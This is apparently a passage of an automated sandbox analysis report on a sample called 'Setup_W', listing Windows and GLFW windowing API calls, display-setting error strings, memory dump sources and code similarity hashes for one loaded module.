                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Format$Pixel$ByteCharChooseErrorLastLibraryLoadMessageMultiWide
                                                                                                • String ID: %$(
                                                                                                • API String ID: 3228403986-93983813
                                                                                                • Opcode ID: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
                                                                                                • Instruction ID: a37b7c411e3238bfb69914b12a3eadec3a1d8eee3d0a0b02257eea71e55caaa7
                                                                                                • Opcode Fuzzy Hash: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
                                                                                                • Instruction Fuzzy Hash: 199128B0909394DFDB12EFAAC54466DFBF4FB46719F01A82DE48487240D7B68444CB53
                                                                                                APIs
                                                                                                • GetPropW.USER32 ref: 6460D18E
                                                                                                • EnableNonClientDpiScaling.USER32 ref: 6460D1DE
                                                                                                  • Part of subcall function 6460A331: calloc.MSVCRT ref: 6460A359
                                                                                                  • Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A3B9
                                                                                                  • Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A41F
                                                                                                  • Part of subcall function 6460A331: wcscmp.MSVCRT ref: 6460A469
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DevicesDisplayEnum$ClientEnablePropScalingcallocwcscmp
                                                                                                • String ID: ($Q
                                                                                                • API String ID: 2143186849-614157966
                                                                                                • Opcode ID: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
                                                                                                • Instruction ID: 56b1b2e10414c6ed154da36c08ccab621a88ac399964cde2fba271c26f532041
                                                                                                • Opcode Fuzzy Hash: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
                                                                                                • Instruction Fuzzy Hash: 07E13B70A04308CFDB18DFA9CA8469EBBF0FF55B14F00CA2AE5959B295D774A845CF42
                                                                                                APIs
                                                                                                • GetDpiForWindow.USER32 ref: 6460CA41
                                                                                                  • Part of subcall function 6460B0A6: SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
                                                                                                  • Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B10C
                                                                                                  • Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B130
                                                                                                • GetWindowLongW.USER32 ref: 6460CB3B
                                                                                                • SetWindowLongW.USER32(00000150,00000150), ref: 6460CB6D
                                                                                                • GetMonitorInfoW.USER32 ref: 6460CB8A
                                                                                                • SetWindowPos.USER32 ref: 6460CCFA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Info$LongParametersSystem$ExecutionMonitorStateThread
                                                                                                • String ID: (
                                                                                                • API String ID: 3930307586-3887548279
                                                                                                • Opcode ID: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
                                                                                                • Instruction ID: ce95d183200969ec0ec3218b39cb76092ca63e45640ddd5fc6678acc3372c675
                                                                                                • Opcode Fuzzy Hash: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
                                                                                                • Instruction Fuzzy Hash: FAA107B0A083059FDB08EF69D98468EBBF0EF88714F10C92DE89997355D774D905CB92
                                                                                                APIs
                                                                                                • UnregisterDeviceNotification.USER32 ref: 64608FAD
                                                                                                • DestroyWindow.USER32(?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024,?,646030E9), ref: 64608FC0
                                                                                                • SystemParametersInfoW.USER32 ref: 64608FEC
                                                                                                • free.MSVCRT ref: 64608FFD
                                                                                                • free.MSVCRT ref: 6460900A
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460902A
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460903D
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609050
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609063
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609076
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609089
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460909C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$free$DestroyDeviceInfoNotificationParametersSystemUnregisterWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1825173338-0
                                                                                                • Opcode ID: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
                                                                                                • Instruction ID: 4751eaf6b87ea121d633ef41e038374e24d4eed0c9cabd56117908b4e63011e8
                                                                                                • Opcode Fuzzy Hash: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
                                                                                                • Instruction Fuzzy Hash: FA31DAB0608381DFEF15BFBACA88A1ABBE8FB15645F01A86CE495C7240DB75D540CB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: callocstrcpy
                                                                                                • String ID: ,
                                                                                                • API String ID: 2080364334-3772416878
                                                                                                • Opcode ID: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
                                                                                                • Instruction ID: 2166c0fec8160fdcf23276cbfbda69153d91a4fbb368ab464f647e45cf49f8a2
                                                                                                • Opcode Fuzzy Hash: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
                                                                                                • Instruction Fuzzy Hash: EBC1E3B49087589FDB55DF29C98469ABBF1BF89704F00C99EE98897300D734DA85CF82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd
                                                                                                • API String ID: 0-339892999
                                                                                                • Opcode ID: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
                                                                                                • Instruction ID: 1ddd88567b8f70bbd00b5d5b2014a53fbbc7393fae63a5ad54a31b5f61634dc3
                                                                                                • Opcode Fuzzy Hash: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
                                                                                                • Instruction Fuzzy Hash: 6A51CD75A082518BDF11CF2DD88068AB7F1FF9B708F11AA2AE944AB715D730E915CBC1
                                                                                                APIs
                                                                                                  • Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC
                                                                                                • ChangeDisplaySettingsExW.USER32 ref: 6460A8D5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DisplaySettings$ChangeEnum
                                                                                                • String ID: $Computer restart required$Failed to write to registry$Graphics mode failed$Graphics mode not supported$Invalid flags$Invalid parameter$The system uses DualView$Unknown error
                                                                                                • API String ID: 1333101904-1192658212
                                                                                                • Opcode ID: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
                                                                                                • Instruction ID: b7b648b479718ed1ff53332b7b2a45aaa3563233a014b2ba000b28bcd7754222
                                                                                                • Opcode Fuzzy Hash: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
                                                                                                • Instruction Fuzzy Hash: FC3192B0A043448BCB14CF69C58079EBBF0EFA5768F50CA69E4A9DB390E330D4468F42
                                                                                                APIs
                                                                                                • GetDC.USER32 ref: 6460B2F3
                                                                                                • CreateDIBSection.GDI32 ref: 6460B331
                                                                                                • ReleaseDC.USER32 ref: 6460B34D
                                                                                                • CreateBitmap.GDI32 ref: 6460B393
                                                                                                • CreateIconIndirect.USER32 ref: 6460B454
                                                                                                • DeleteObject.GDI32 ref: 6460B466
                                                                                                • DeleteObject.GDI32 ref: 6460B472
                                                                                                • DeleteObject.GDI32 ref: 6460B3C4
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDeleteObject$BitmapByteCharErrorFormatIconIndirectLastMessageMultiReleaseSectionWide
                                                                                                • String ID: |
                                                                                                • API String ID: 2799049117-2343686810
                                                                                                • Opcode ID: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
                                                                                                • Instruction ID: e6dfc101f53f0bffcb151d90b53f43c180f82b0aa41017cfdc907e9a12dc0c54
                                                                                                • Opcode Fuzzy Hash: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
                                                                                                • Instruction Fuzzy Hash: B851FF70908318CFEB25DF69C984B9ABBF0AF4A704F00C4ADD98897340D7759A88CF52
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32 ref: 6460B6D6
                                                                                                • GetClientRect.USER32 ref: 6460B6FB
                                                                                                  • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087DA
                                                                                                  • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087F6
                                                                                                  • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 64608812
                                                                                                  • Part of subcall function 6460877D: RtlVerifyVersionInfo.NTDLL ref: 64608830
                                                                                                • GetDpiForWindow.USER32(00000000), ref: 6460B725
                                                                                                • AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460B770
                                                                                                • ClientToScreen.USER32 ref: 6460B78C
                                                                                                • ClientToScreen.USER32(00000000,00000000), ref: 6460B7A0
                                                                                                • SetWindowLongW.USER32 ref: 6460B7B9
                                                                                                • SetWindowPos.USER32 ref: 6460B7FB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientConditionMask$LongRectScreen$AdjustInfoVerifyVersion
                                                                                                • String ID: 4
                                                                                                • API String ID: 4217418125-4088798008
                                                                                                • Opcode ID: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
                                                                                                • Instruction ID: 72991660b5e62e9fb88cc883b23a07306cfc7d732dec7a01ff09eadeeccb0505
                                                                                                • Opcode Fuzzy Hash: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
                                                                                                • Instruction Fuzzy Hash: CE41D8B1A083059FCB04EF69C58869EBBF8EF89714F00892DE898D7345DB749844CF92
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$HandleImageModule$ClassCursorRegister
                                                                                                • String ID: #$0
                                                                                                • API String ID: 1994909298-310112417
                                                                                                • Opcode ID: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
                                                                                                • Instruction ID: 8833cee7edfb7f9070425f7573ad03eaceadb5a558f22546ce01d072ee062e0d
                                                                                                • Opcode Fuzzy Hash: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
                                                                                                • Instruction Fuzzy Hash: F121EAB0808344DBEB01AFA5D95879EBBF4FF88705F00991DE59897240DBB989488B92
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                                                • String ID: @
                                                                                                • API String ID: 1616349570-2766056989
                                                                                                • Opcode ID: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
                                                                                                • Instruction ID: 9e0d6672c3fcfc9b39a93dd72e7bd94e9e8b2bda23d8cb2d541a2a85f03da3ec
                                                                                                • Opcode Fuzzy Hash: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
                                                                                                • Instruction Fuzzy Hash: 8C4137B190C3419FDB11EF29C48565EFBE0FF96358F51892EE8988B214E734E854CB92
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$ActiveDispatchPeekPropStateTranslateWindow
                                                                                                • String ID: `:ad
                                                                                                • API String ID: 1098235094-94877694
                                                                                                • Opcode ID: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
                                                                                                • Instruction ID: 893a9ba0832886e63f4c01581edf47c081ddb0a9f75bb26455985c2c0c5d4a68
                                                                                                • Opcode Fuzzy Hash: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
                                                                                                • Instruction Fuzzy Hash: D24187B1908385DBDB04AFA6C5846AEBBF5FF44B10F00D82DE8959B201DB70D888CB52
                                                                                                APIs
                                                                                                • glfwDestroyWindow.GLFW.4281411633(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D75
                                                                                                • glfwDestroyCursor.GLFW.4281411633(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D88
                                                                                                • free.MSVCRT ref: 64602DC4
                                                                                                • free.MSVCRT ref: 64602DE5
                                                                                                • free.MSVCRT ref: 64602E2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Destroyglfw$Cursor.Window.
                                                                                                • String ID: 0cd$ ;cd
                                                                                                • API String ID: 2442548815-1884057578
                                                                                                • Opcode ID: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
                                                                                                • Instruction ID: 9aad1b5e57044b7d2b94080ccc180e97156aa84a46e9e744f830eeb9d27d8246
                                                                                                • Opcode Fuzzy Hash: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
                                                                                                • Instruction Fuzzy Hash: 4121A7706087908BFB15AF6AC294799BBE4FF15B44F40A92ED5808BB80DB35DCC48B56
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
